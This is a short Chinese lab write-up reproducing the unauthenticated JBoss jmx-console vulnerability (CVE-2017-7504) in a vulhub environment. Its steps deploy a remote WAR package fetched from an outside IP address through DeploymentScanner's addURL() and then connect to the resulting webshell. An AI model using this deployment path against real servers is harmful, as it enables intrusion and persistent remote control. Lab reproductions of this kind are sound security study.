漏洞描述
此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到 jmx控制台,并在其中执⾏任何功能。
影响范围
Jboss4.x以下
环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
漏洞复现
1.访问
http://172.16.1.78:8080/jmx-console/
2.这⾥我们使⽤得复现环境不存在,所以需要密码(正常环境⽆需密码直接可进⼊)
admin admin
3.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)
4.找到⻚⾯中的void addURL() 选项远程加载war包来部署。
5.制作war包 填写war包远程地址
http://47.113.231.0/shw.war
6.webshell连接
http://172.16.1.78:8080/shw/shell.jsp
![[漏洞复现]泛微e-mobile cdnfile文件读取漏洞分析复现](https://i-blog.csdnimg.cn/direct/7266ee7d68584fce91140b7d4855c1fb.png)
